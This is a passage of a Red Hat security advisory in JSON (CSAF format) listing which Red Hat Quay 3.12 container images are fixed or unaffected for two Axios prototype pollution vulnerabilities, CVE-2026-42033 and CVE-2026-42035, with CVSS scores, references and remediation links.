          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461607",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461607"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42033",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
        }
      ],
      "release_date": "2026-04-24T17:36:44.132000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: HTTP Transport Hijacking via Prototype Pollution"
    },
    {
      "cve": "CVE-2026-42035",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:17.109481+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461606"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application\u0027s core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Arbitrary HTTP header injection via prototype pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461606",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461606"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42035",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9"
        }
      ],
      "release_date": "2026-04-24T17:38:07.752000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
